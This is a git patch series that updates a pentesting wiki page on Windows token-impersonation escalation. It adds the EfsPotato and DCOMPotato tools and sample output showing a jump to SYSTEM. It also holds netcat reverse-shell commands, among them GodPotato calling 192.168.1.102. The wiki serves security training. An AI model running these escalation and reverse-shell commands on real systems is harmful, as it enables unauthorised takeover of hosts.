From 82743ad320e1c86d6e7d522a634e5c01056cc04c Mon Sep 17 00:00:00 2001 From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Wed, 17 Jul 2024 07:08:16 +1000 Subject: [PATCH 1/5] Add EfsPotato --- .../privilege-escalation-abusing-tokens/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md index 3915be73f..2ff5e485b 100644 --- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md +++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md @@ -24,7 +24,7 @@ If you **don't know what are Windows Access Tokens** read this page before conti ### SeImpersonatePrivilege -This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). +This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato) and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). {% content-ref url="../roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../roguepotato-and-printspoofer.md) From b44fe27cf06300f8fc7911558616b64d548f156a Mon Sep 17 00:00:00 2001 From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Wed, 17 Jul 2024 07:11:31 +1000 Subject: [PATCH 2/5] roguepotato-and-printspoofer.md: Add EfsPotato --- .../roguepotato-and-printspoofer.md | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index 4f87e88b0..3192f3c62 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -29,7 +29,7 @@ You can check their website and try their engine for **free** at: *** {% hint style="warning" %} -**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. +**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,**[**EfsPotato**](https://github.com/zcgonvh/EfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. {% endhint %} ## Quick Demo @@ -82,6 +82,25 @@ C:\temp>type C:\temp\w.log nt authority\system ``` +### EfsPotato + +``` +EfsPotato.exe "whoami" +Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). +Part of GMH's fuck Tools, Code By zcgonvh. +CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] + +[+] Current user: NT Service\MSSQLSERVER +[+] Pipe: \pipe\lsarpc +[!] binding ok (handle=aeee30) +[+] Get Token: 888 +[!] process with pid: 3696 created. +============================== +[x] EfsRpcEncryptFileSrv failed: 1818 + +nt authority\system +``` + ### GodPotato ``` @@ -96,6 +115,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" * [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) * [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) * [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) +* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) ### [WhiteIntel](https://whiteintel.io) From 566d9ff5c2d1301c45fbdbea6b11d30b9bdd162f Mon Sep 17 00:00:00 2001 From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Wed, 17 Jul 2024 07:14:19 +1000 Subject: [PATCH 3/5] roguepotato-and-printspoofer.md: Add bash syntax highlighting and '>' command input indicators --- .../roguepotato-and-printspoofer.md | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index 3192f3c62..622c675b4 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -63,8 +63,8 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f ### SharpEfsPotato -``` -SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" +```bash +> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. @@ -84,8 +84,8 @@ nt authority\system ### EfsPotato -``` -EfsPotato.exe "whoami" +```bash +> EfsPotato.exe "whoami" Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). Part of GMH's fuck Tools, Code By zcgonvh. CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] @@ -103,9 +103,10 @@ nt authority\system ### GodPotato -``` -GodPotato -cmd "cmd /c whoami" -GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" +```bash +> GodPotato -cmd "cmd /c whoami" +# You can achieve a reverse shell like this. +> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` ## References From 92c03ab815620160bde86a1794a3be01833e07d9 Mon Sep 17 00:00:00 2001 From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Thu, 25 Jul 2024 00:58:13 +1000 Subject: [PATCH 4/5] Update README.md --- .../privilege-escalation-abusing-tokens/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md index 2ff5e485b..c237c4a01 100644 --- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md +++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md @@ -24,7 +24,7 @@ If you **don't know what are Windows Access Tokens** read this page before conti ### SeImpersonatePrivilege -This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato) and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). +This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato), [DCOMPotato](https://github.com/zcgonvh/DCOMPotato) and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). {% content-ref url="../roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../roguepotato-and-printspoofer.md) From 5537189f6328de03dfc0c1681bd5f8427ffca0c9 Mon Sep 17 00:00:00 2001 From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Thu, 25 Jul 2024 01:01:23 +1000 Subject: [PATCH 5/5] roguepotato-and-printspoofer.md: Addition of DCOMPotato --- .../roguepotato-and-printspoofer.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index 622c675b4..6edf97c40 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -29,7 +29,7 @@ You can check their website and try their engine for **free** at: *** {% hint style="warning" %} -**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,**[**EfsPotato**](https://github.com/zcgonvh/EfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. +**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. {% endhint %} ## Quick Demo @@ -109,6 +109,11 @@ nt authority\system > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` +### DCOMPotato + +![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa) + + ## References * [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) @@ -117,6 +122,7 @@ nt authority\system * [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) * [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) * [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) +* [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) ### [WhiteIntel](https://whiteintel.io)